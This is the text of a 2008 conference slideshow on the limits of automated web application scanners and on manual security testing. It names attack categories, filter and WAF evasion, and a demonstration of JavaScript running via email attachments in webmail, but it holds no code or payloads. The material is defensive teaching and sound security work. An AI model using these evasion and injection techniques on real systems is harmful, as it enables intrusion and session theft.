Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Web 2.0 Hacking

1,036 views

Published on

Explore the limitations of today's web scanners and see where manual web testing takes over.

Published in: Technology
  • Be the first to comment

Web 2.0 Hacking

  1. 1. Web Application Security Assessments: Beyond the Automated Scanners Presented by: Blake Turrentine, [email_address] Date: August 25, 2008 Locale: DHS Conference and Workshops, Baltimore, MD
  2. 2. Scanning Web 1.0 Technology
  3. 3. Scanning Today’s Web 2.0 Technology
  4. 4. Mashups and Web Widgets
  5. 5. Beyond the Browser: Desktop Widgets
  6. 6. The Security Process <ul><li>Threat Modeling </li></ul><ul><li>STRIDE </li></ul><ul><li>CIGITAL </li></ul><ul><li>CLASP </li></ul><ul><li>FISMA/NIST </li></ul>
  7. 7. Types of Testing Techniques <ul><li>Black Box </li></ul><ul><li>White Box </li></ul><ul><li>Grey Box </li></ul>
  8. 8. Types of Automated Scanners <ul><li>Static Code Analysis </li></ul><ul><li>Vulnerability </li></ul><ul><li>Web Application Specific </li></ul><ul><li>Fuzzers </li></ul><ul><li>Web Application Firewalls </li></ul>
  9. 9. <ul><li>Fortify Source Code Analyzer </li></ul><ul><li>Qualys, Nessus, Saint, Foundscan </li></ul><ul><li>WebInspect, Cenzic, Appscan, Nikto </li></ul><ul><li>Mu4000, Codenomicon, Peach, Spike </li></ul><ul><li>Web application firewalls: </li></ul><ul><ul><li>Imperva </li></ul></ul><ul><ul><li>Fortify </li></ul></ul><ul><ul><li>Mod-Security </li></ul></ul>Today’s Automated Scanners
  10. 10. <ul><li>Putting too much faith in automated scanners </li></ul><ul><li>Their limitations – intuitiveness </li></ul><ul><li>Low hanging fruit </li></ul><ul><li>False positives and false negatives </li></ul><ul><li>508 Compliance / CAPTCHA </li></ul><ul><li>Out-maneuvering IPS and WAFS </li></ul><ul><li>Dangers of injecting code in production environments </li></ul>Problems with Automated Scans
  11. 11. <ul><li>Spidering </li></ul><ul><li>Complex business logic </li></ul><ul><li>Complex session handling </li></ul><ul><li>Semantics </li></ul><ul><li>Detecting Sensitive Data </li></ul><ul><li>Asynchronous dynamic code execution </li></ul><ul><li>Horizontal and vertical escalation </li></ul><ul><li>Mashups, Ajax bridges, widgets, RSS feeds </li></ul><ul><li>Emerging technologies such as Air and Silverlight </li></ul>More Problems With Automated Scans
  12. 12. <ul><li>Validation of automated scanners </li></ul><ul><li>Application profiling </li></ul><ul><li>Examining known attack vectors </li></ul><ul><li>Looking for compromise </li></ul><ul><li>Fuzzing </li></ul>Approaching a Better Solution: Taking a Closer Look
  13. 13. <ul><li>Application Fingerprinting </li></ul><ul><li>COTS </li></ul><ul><li>The mindset of application developers: </li></ul><ul><ul><li>Server Side Code Developer </li></ul></ul><ul><ul><li>Client Side Code Developer </li></ul></ul><ul><ul><li>System Administrator (SA) </li></ul></ul><ul><ul><li>Database Administrator (DBA) </li></ul></ul>Application Profiling
  14. 14. <ul><li>Catalog application, then vulnerability detection </li></ul><ul><li>The checklist </li></ul>Examining Known Vectors
  15. 15. <ul><li>Obfuscation </li></ul><ul><li>Lazy-Loading </li></ul><ul><li>Compromise </li></ul><ul><li>Browser/Server Security tradeoffs </li></ul>Client Side: Why scanners have difficulties in handling Advance JavaScript
  16. 16. <ul><li>Decompiling Bytecode / (It is not HTML) </li></ul><ul><li>Complex Session Management </li></ul>Client Side: Why scanners can’t handle Applets
  17. 17. <ul><li>Upload/download of files </li></ul><ul><li>Effective screening of content/control </li></ul><ul><li>Open boundary conditions </li></ul><ul><li>Embedded objects, action scripts, plug-ins, Active-X </li></ul><ul><li>Who’s responsible for the content supplied </li></ul><ul><li>Blacklists, Whitelists, Regex, selective lists </li></ul>Server Side: Input/output of content is getting more complex
  18. 18. <ul><li>Response Analysis </li></ul><ul><li>Blacklisting </li></ul><ul><li>Encoding tactics </li></ul><ul><li>Problems in dealing with Rich Internet Apps (Flash, RSS, Widgets) </li></ul><ul><li>Whitelisting drawbacks: bypassing Regex </li></ul><ul><li>Employ input and output validation with both Whitelists and Blacklists </li></ul><ul><li>Good input validation, poor output validation </li></ul>Server Side: Scanners Lack of Filter Enumeration and Evasion
  19. 19. <ul><li>XML parsing, manipulation, appending files, lack of tools </li></ul><ul><li>AJAX -Extended Footprint (traditional Web application with Web services) </li></ul>Complexity of analysis in Web Services
  20. 20. <ul><li>Inter-protocol exploitation and communication </li></ul><ul><li>Forced directory browsing - access control </li></ul><ul><li>Backend Web services </li></ul><ul><li>API reverse engineering </li></ul><ul><li>Authorization, session management, horizontal and vertical escalation, AJAX </li></ul>Difficulties in Testing Application Logic
  21. 21. <ul><li>XSS, SQL, Command, HTML Injection </li></ul><ul><li>SMTP </li></ul><ul><li>Browser types, versions and plug-ins, ActiveX </li></ul><ul><li>Server configurations </li></ul><ul><li>Interpretation of Error handling (database errors, stack traces) </li></ul><ul><li>Encoding Tactics </li></ul><ul><li>Attacking the Admin </li></ul><ul><li>Multilayer, 2 nd Order Attacks, Edge Cases </li></ul>Sophistication in Combining Attacks Vectors
  22. 22. <ul><li>Parsing the database </li></ul><ul><li>Script calls </li></ul><ul><li>Embedded AJAX </li></ul><ul><li>RSS </li></ul><ul><li>Flash </li></ul><ul><li>CSRF </li></ul><ul><li>Active-X calls </li></ul><ul><li>Outbound calls </li></ul><ul><li>Botnets </li></ul><ul><li>Mastering the DOM- polymorphic JavaScript </li></ul>Most Scanners Don’t Look for Infestation CSRF
  23. 23. <ul><li>Looking for Hooking Events Onload and OnFocus, eval() </li></ul><ul><li>Looking for user events such as, OnMouseOver </li></ul><ul><li>Making HTTP connections to offsite </li></ul><ul><li>OnKeyEvent </li></ul><ul><li>Asynchronous Stream Injections With Dynamic Script Execution </li></ul><ul><li>The Javascript Interpreter (Caffeine Monkey, SpiderMonkey) Obfuscation, whitespacing </li></ul>Infestation Detection
  24. 24. <ul><li>Pros and Cons </li></ul><ul><li>File Fuzzing </li></ul><ul><li>Fuzzing APIs </li></ul><ul><li>HTTP Server Responses Codes </li></ul><ul><li>Code Paths </li></ul>Difficulties in Fuzzing Analysis
  25. 25. <ul><li>The machine and the human element </li></ul><ul><li>Machine to machine </li></ul><ul><li>Code maintenance </li></ul><ul><li>Preventing your app from becoming a part of a Botnet </li></ul><ul><li>SDLC process </li></ul><ul><li>Regression testing </li></ul><ul><li>Dealing with 0-day attacks </li></ul>Closing Remarks
  26. 26. Demonstration: <ul><li>Bypassing Defense in Depth </li></ul>
  27. 27. Webmail Application Test: Combining Server & Client Attack Vectors
  28. 28. Webmail Application Test: IE Recognizes File as a HTML
  29. 29. Webmail Application Test: Session Cookie is Displayed
  30. 30. GMail Web Application Test: Screenshot of Attached file
  31. 31. GMail Web Application Test: IE Recognizes File as an HTML
  32. 32. GMail Web Application Test: Javascript Fires
  33. 33. Yahoo Mail Web Application Test: Creating an Email
  34. 34. Yahoo Mail Web Application Test: Contents of ‘Instructions.doc’
  35. 35. Yahoo Mail Web Application Test: Screenshot of Attached File
  36. 36. Yahoo Mail Web Application Test: Norton AV Scans File Before Download
  37. 37. Yahoo Mail Web Application Test: Javascript Fires
  38. 38. Yahoo Mail Web Application Test: Redirection to Another Site
  39. 39. Q u e s t i o n s ??

×